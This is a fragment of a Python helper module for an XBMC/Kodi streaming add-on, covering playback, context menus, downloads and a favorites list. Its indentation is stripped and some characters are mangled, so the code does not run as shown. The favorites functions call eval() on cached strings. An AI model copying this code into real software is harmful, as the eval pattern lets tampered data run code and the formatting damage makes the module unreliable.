li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
try: play.play(url, li)
except: t=''
def PlayFromHost(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(stream_url,li);
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
t='';
def PlayFromHostMT(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
#from axel.downloader import proxy;
import proxy;
axelhelper=proxy.ProxyHelper()
axelhelper.playUrl(stream_url);
#print axelhelper.download(urlhere);
#MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
#play.play(MultiThread_url,li);
return
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
#play.play(stream_url,li);
play.play(MultiThread_url,li);
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
t='';
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
years=re.compile(' \((\d+)\)').findall('__'+name+'__')
for year in years:
name=name.replace(' ('+year+')','')
name=name.strip()
return name
def QP(v): return urllib.quote_plus(v)
def DoLabs2LB(labs,subfav=''):
LB={}
n='title'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='year'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='img'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='fanart'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='plot'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='url'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='country'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='genres'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='todoparams'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='commonid'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='commonid2'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='plot'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='site'
try: LB[n]=labs[n]
except:
try: LB[n]=addpr(n,'')
except: LB[n]=''
n='section'
try: LB[n]=labs[n]
except:
try: LB[n]=addpr(n,'')
except: LB[n]=''
##try: LB['subfav']=subfav
##except: LB['subfav']=''
#n=''
#try: LB[n]=labs[n]
#except: LB[n]=''
return LB
def ContextMenu_Favorites(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
try: _subfav=addpr('subfav','')
except: _subfav=''
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
if _subfav=='': _sf='1'
else: _sf=_subfav
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
#if _sf is not '1': LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
#if _sf is not '2': LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#if _sf is not '3': LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#if _sf is not '4': LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#if _sf is not '5': LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#if _sf is not '6': LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
#if _sf is not '7': LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
LB['mode']='cFavoritesRemove'; LB['subfav']=_subfav; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append(('Remove',Pars)) #'Remove: '+WRFC+addst('fav.tv.'+_sf+'.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Movies(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Movie Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','movies',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','movies',nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb'): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','movies',urllib.quote_plus('http://merdb.ru/'),nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms'): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', title, '1')))
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.2.name'),Pars))
#LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.3.name'),Pars))
#LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.4.name'),Pars))
#LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.5.name'),Pars))
#LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.6.name'),Pars))
#LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Series(labs={},TyP='tv'):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Show Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_FindAirDates"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Find AirDates', 'XBMC.Container.Update(%s?mode=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','SearchForAirDates',labs['title'])))
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','tv',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','tv',nameonly)))
if (tfalse(addst("CMI_SearchMerDBru"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb')): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','tvshows',urllib.quote_plus('http://merdb.ru/tvshow/'),nameonly)))
if (tfalse(addst("CMI_SearchIceFilms"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms')): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', labs['title'], '1')))
try:
WRFC=ps('WhatRFavsCalled'); WRFCr='Remove: '
LB=DoLabs2LB(labs); McFA='cFavoritesAdd'; McFR='cFavoritesRemove'; LB['mode']=McFA; P1='XBMC.RunPlugin(%s)'
#LB['mode']=McFA; LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='1';
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Films - Movies'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
if TyP=='movie':
LB['subfav']=''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
else:
for nn in ['2']: #,'3','4','5','6','7']:
LB['subfav']=nn;
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Seriale - TV Shows'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
#LB['mode']=McFA; LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#LB['mode']=McFA; LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#LB['mode']=McFA; LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#LB['mode']=McFA; LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#LB['mode']=McFA; LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
if (tfalse(addst("CMI_RefreshMetaData","true"))==True): LB['mode']='refresh_meta'; LabelName='Refresh MetaData'; LB['imdb_id']=LB['commonid']; LB['alt_id']='imdbnum'; LB['video_type']='tvshow'; LB['year']; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
except: pass
return contextMenuItems
def ContextMenu_Episodes(labs={}):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Episode Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_Hosts(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Host Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloaderResolver"))==True: contextMenuItems.append(('JDownloader (UrlResolver)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'true')))
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'false')))
if ('destfile' in labs) and (len(addst('download_folder_default','')) > 0):
contextMenuItems.append(('Download','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',urllib.quote_plus(labs['url']),'true',urllib.quote_plus(addst('download_folder_default','')),urllib.quote_plus(labs['destfile']) ) ))
#elif ('title' in labs) and (len(addst('download_folder_default','')) > 0):
return contextMenuItems
def ContextMenu_LiveStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Stream Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_VideoUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDowfnloader',urllib.quote_plus(labs['url']),'false')))
#contextMenuItems.append(('Downloader','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',labs['url'],'false','','')))
return contextMenuItems
def ContextMenu_ImageUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioUrls(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_AudioRadioStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def XBMC_RunPlugin(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.RunPlugin(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
def XBMC_ContainerUpdate(plugId,plugParams,plugFile=''): xbmc.executebuiltin("XBMC.Container.Update(plugin://%s/%s?%s)" % (plugId,plugFile,plugParams) )
### ############################################################################################################
### ############################################################################################################
def SendTo_JDownloader(url,useResolver=True):
myNote('Download','sending to jDownloader plugin',15000)
if useResolver==True:
try:
import urlresolver
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
xbmc.executebuiltin("XBMC.RunPlugin(plugin://plugin.program.jdownloader/?action=addlink&url=%s)" % link)
try: _addon.resolve_url(url)
except: pass
### ############################################################################################################
### ############################################################################################################
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import c_HiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
def ExtractThis(filename,destpath):
import c_Extract as extract
return extract.allNoProgress(filename,destpath)
def DownloadThis(url,destfile,destpath,useResolver=True):
destpath=xbmc.translatePath(destpath)
import c_HiddenDownloader as downloader
debob(str(useResolver))
if useResolver==True:
try:
import urlresolver
#debob(urlresolver.HostedMediaFile(url))
link=urlresolver.HostedMediaFile(url).resolve()
except: link=url
else: link=url
deb('downloadable url',link)
downloader.download(link,destfile,destpath,useResolver)
#downloader.download(url,destfile,destpath,useResolver)
### ############################################################################################################
### ############################################################################################################
def XBMC_RefreshRSS(): xbmc.executebuiltin("XBMC.RefreshRSS()")
def XBMC_EjectTray(): xbmc.executebuiltin("XBMC.EjectTray()")
def XBMC_Mute(): xbmc.executebuiltin("XBMC.Mute()")
def XBMC_System_Exec(url): xbmc.executebuiltin("XBMC.System.Exec(%s)" % url)
def XBMC_System_ExecWait(url): xbmc.executebuiltin("XBMC.System.ExecWait(%s)" % url)
def XBMC_PlayDVD(): xbmc.executebuiltin("XBMC.PlayDVD()")
def XBMC_ReloadSkin(): xbmc.executebuiltin("XBMC.ReloadSkin()")
def XBMC_UpdateAddonRepos(): xbmc.executebuiltin("XBMC.UpdateAddonRepos()")
def XBMC_UpdateLocalAddons(): xbmc.executebuiltin("XBMC.UpdateLocalAddons()")
def XBMC_Weather_Refresh(): xbmc.executebuiltin("XBMC.Weather.Refresh()")
def XBMC_ToggleDebug(): xbmc.executebuiltin("XBMC.ToggleDebug()")
def XBMC_Minimize(): xbmc.executebuiltin("XBMC.Minimize()")
def XBMC_ActivateScreensaver(): xbmc.executebuiltin("XBMC.ActivateScreensaver()")
### ############################################################################################################
### ############################################################################################################
def fav__COMMON__empty(site,section,subfav=''): WhereAmI('@ Favorites - Empty - %s%s' % (section,subfav)); favs=[]; cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); myNote(bFL('Favorites'),bFL('Your Favorites Have Been Wiped Clean. Bye Bye.'))
def fav__COMMON__remove(site,section,name,year,subfav=''):
WhereAmI('@ Favorites - Remove - %s%s' % (section,subfav)); deb('fav__remove() '+section,name+' ('+year+')'); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); tf=False
if saved_favs:
favs=eval(saved_favs)
if favs:
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def fav__COMMON__add(site,section,name,year='',img=_artIcon,fanart=_artFanart,subfav='',plot='',commonID='',commonID2='',ToDoParams='',Country='',Genres='',Url=''):
debob(['fav__add()',section,name+' ('+year+')',img,fanart]); WhereAmI('@ Favorites - Add - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]; fav_found=False
if saved_favs:
#debob(saved_favs)
favs=eval(saved_favs)
if favs:
#debob(favs)
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
if (name==_name) and (year==_year):
fav_found=True;
if len(year) > 0: myNote(bFL(section+': '+name.upper()+' ('+year+')'),bFL('Already in your Favorites'));
else: myNote(bFL(section+': '+name.upper()),bFL('Already in your Favorites'));
return
#
deb('Adding Favorite',site+' - '+section+' - '+subfav)
debob(['name',name,'year',year,'img',img,'fanart',fanart,'Country',Country,'Url',Url,'plot',plot,'Genres',Genres,'site',site,'subfav',subfav,'section',section,'ToDoParams',ToDoParams,'commonID',commonID,'commonID2',commonID2])
favs.append((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
##if (section==ps('section.tvshows')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],_param['dbid']))
##elif (section==ps('section.movie')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],''))
##else: myNote('Favorites: '+section,'Section not Found')
#
cache.set('favs_'+site+'__'+section+subfav+'__', str(favs));
if len(year) > 0: myNote(bFL(name+' ('+year+')'),bFL('Added to Favorites'))
else: myNote(bFL(name),bFL('Added to Favorites'))
#
def fav__COMMON__list_fetcher(site,section='',subfav=''):
WhereAmI('@ Favorites - List - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]
if saved_favs:
debob('saved_favs found'); debob(saved_favs); favs=sorted(eval(saved_favs), key=lambda fav: (fav[1],fav[0]),reverse=True); ItemCount=len(favs)
if favs:
debob('favs found'); debob(favs);
return favs
## ((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
#for (name,year,img,fanart,country,url,plot,genre,dbid) in favs:
# except: deb('Error Listing Item',name+' ('+year+')')
# else: myNote('Favorites: '+section,'Section not found');
#if (section==ps('section.tvshows')): set_view('tvshows',addst('anime-view'),True)
#elif (section==ps('section.movie')): set_view('movies' ,addst('movies-view'),True)
else: return ''
else: return ''
#
def fav__COMMON__check(site,section,name,year,subfav=''):
saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__');
if saved_favs:
favs=eval(saved_favs);
if favs:
#debob(favs);
for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
#if (name==_name) and (year==_year): return True
if (name==_name): return True
return False
else: return False
else: return False
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
years=re.compile(' \((\d+)\)').findall('__'+name+'__')
for year in years:
name=name.replace(' ('+year+')','')
name=name.strip()
return name
def filename_filter_colorcodes(name=''):
if ('[/color]' in name): name=name.replace('[/color]','')
if ('[/COLOR]' in name): name=name.replace('[/COLOR]','')
if ('[color lime]' in name): name=name.replace('[color lime]','')
if ('[COLOR lime]' in name): name=name.replace('[COLOR lime]','')
if ('[COLOR green]' in name): name=name.replace('[COLOR green]','')
if ('[COLOR yellow]' in name): name=name.replace('[COLOR yellow]','')
if ('[COLOR red]' in name): name=name.replace('[COLOR red]','')
if ('[b]' in name): name=name.replace('[b]','')
if ('[B]' in name): name=name.replace('[B]','')
if ('[/b]' in name): name=name.replace('[/b]','')
if ('[/B]' in name): name=name.replace('[/B]','')
if ('[cr]' in name): name=name.replace('[cr]','')
if ('[CR]' in name): name=name.replace('[CR]','')
if ('[i]' in name): name=name.replace('[i]','')
if ('[I]' in name): name=name.replace('[I]','')
if ('[/i]' in name): name=name.replace('[/i]','')
if ('[/I]' in name): name=name.replace('[/I]','')
if ('[uppercase]' in name): name=name.replace('[uppercase]','')
if ('[UPPERCASE]' in name): name=name.replace('[UPPERCASE]','')
if ('[lowercase]' in name): name=name.replace('[lowercase]','')
if ('[LOWERCASE]' in name): name=name.replace('[LOWERCASE]','')
name=name.strip()
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
#if ('' in name): name=name.replace('','')
return name
def Download_PrepExt(url,ext='.flv'):
if '.zip' in url: ext='.zip' #Compressed Files
elif '.rar' in url: ext='.rar'
elif '.z7' in url: ext='.z7'
elif '.png' in url: ext='.png' #images
elif '.jpg' in url: ext='.jpg'
elif '.gif' in url: ext='.gif'
elif '.bmp' in url: ext='.bmp'
elif '.jpeg' in url: ext='.jpeg'
elif '.mp4' in url: ext='.mp4' #Videos
elif '.mpeg' in url: ext='.mpeg'
elif '.avi' in url: ext='.avi'
elif '.flv' in url: ext='.flv'
